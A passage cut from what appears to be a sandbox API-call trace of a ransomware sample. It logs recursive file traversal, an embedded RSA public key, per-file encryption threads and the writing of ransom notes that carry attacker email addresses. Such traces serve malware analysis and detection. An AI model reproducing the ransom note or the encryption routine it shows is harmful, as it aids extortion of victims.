possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0197.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd58 [0197.378] CloseHandle (hObject=0xd58) returned 1 [0197.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0197.378] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="Videos" [0197.378] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0197.378] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0197.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.378] lstrcmpW (lpString1="DTMS 07a7Aq-XEUh0", lpString2="..") returned 1 [0197.378] lstrcmpW (lpString1="DTMS 07a7Aq-XEUh0", lpString2=".") returned 1 [0197.378] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0197.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0197.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0197.378] SetErrorMode (uMode=0x1) returned 0x1 [0197.378] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0197.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.378] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*" [0197.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0197.379] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0197.379] lstrcpyW (in: lpString1=0x17b644, lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0197.379] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.379] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.379] lstrcmpW (lpString1="02D7186C2A67434F1071035C2E882797.XZZX", lpString2="..") returned 1 [0197.379] lstrcmpW (lpString1="02D7186C2A67434F1071035C2E882797.XZZX", lpString2=".") returned 1 [0197.379] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0197.379] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="ntldr") returned 0x0 [0197.379] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="NTLDR") returned 0x0 [0197.379] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0197.379] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="ntdetect.com") returned 0x0 [0197.379] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0197.379] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") [0197.379] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.379] lstrcpyW (in: lpString1=0x17be7c, lpString2="02D7186C2A67434F1071035C2E882797.XZZX" | out: lpString1="02D7186C2A67434F1071035C2E882797.XZZX") returned="02D7186C2A67434F1071035C2E882797.XZZX" [0197.379] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd60 [0197.380] Sleep (dwMilliseconds=0x96) [0197.532] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.533] lstrcmpW (lpString1="0790B504415F6E976181B814459452DF.XZZX", lpString2="..") returned 1 [0197.533] lstrcmpW (lpString1="0790B504415F6E976181B814459452DF.XZZX", lpString2=".") returned 1 [0197.533] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0197.533] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="ntldr") returned 0x0 [0197.533] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="NTLDR") returned 0x0 [0197.533] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0197.533] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="ntdetect.com") returned 0x0 [0197.533] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0197.533] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") [0197.533] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.533] lstrcpyW (in: lpString1=0x17be7c, lpString2="0790B504415F6E976181B814459452DF.XZZX" | out: lpString1="0790B504415F6E976181B814459452DF.XZZX") returned="0790B504415F6E976181B814459452DF.XZZX" [0197.533] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd64 [0197.533] Sleep (dwMilliseconds=0x96) [0197.688] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.689] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.689] lstrcmpW (lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpString2="..") returned 1 [0197.689] lstrcmpW (lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpString2=".") returned 1 [0197.689] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0197.689] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="ntldr") returned 0x0 [0197.689] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="NTLDR") returned 0x0 [0197.689] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0197.689] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="ntdetect.com") returned 0x0 [0197.689] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0197.689] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") [0197.689] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.689] lstrcpyW (in: lpString1=0x17be7c, lpString2="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" | out: lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" [0197.689] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd68 [0197.690] Sleep (dwMilliseconds=0x96) [0197.844] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.845] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.845] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0197.845] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0197.845] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0197.845] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0197.845] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0197.845] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0197.845] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0197.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*" [0197.845] SetErrorMode (uMode=0x1) returned 0x1 [0197.845] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT") returned 76 [0197.845] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0197.846] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0197.846] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xd6c) returned 0x0 [0197.846] RegQueryValueExW (in: hKey=0xd6c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b81e8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43b81e8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0197.846] RegCloseKey (hKey=0xd6c) returned 0x0 [0197.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0197.846] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0197.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd6c [0197.846] CloseHandle (hObject=0xd6c) returned 1 [0197.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0197.846] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0197.846] lstrcpyW (in: lpString1=0x17b644, lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0197.847] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0197.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0197.847] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.847] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0197.847] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.847] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.847] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0197.847] lstrcmpW (lpString1="2SS69ds5b7DlSJShTY0o", lpString2="..") returned 1 [0197.847] lstrcmpW (lpString1="2SS69ds5b7DlSJShTY0o", lpString2=".") returned 1 [0197.847] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0197.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0197.847] SetErrorMode (uMode=0x1) returned 0x1 [0197.847] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0197.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0197.847] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0197.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*" [0197.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0197.847] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0197.848] lstrcpyW (in: lpString1=0x17a5a4, lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0197.848] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0197.848] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0197.848] lstrcmpW (lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpString2="..") returned 1 [0197.848] lstrcmpW (lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpString2=".") returned 1 [0197.848] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0197.848] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="ntldr") returned 0x0 [0197.848] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="NTLDR") returned 0x0 [0197.848] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0197.848] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="ntdetect.com") returned 0x0 [0197.848] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0197.848] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") [0197.848] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- 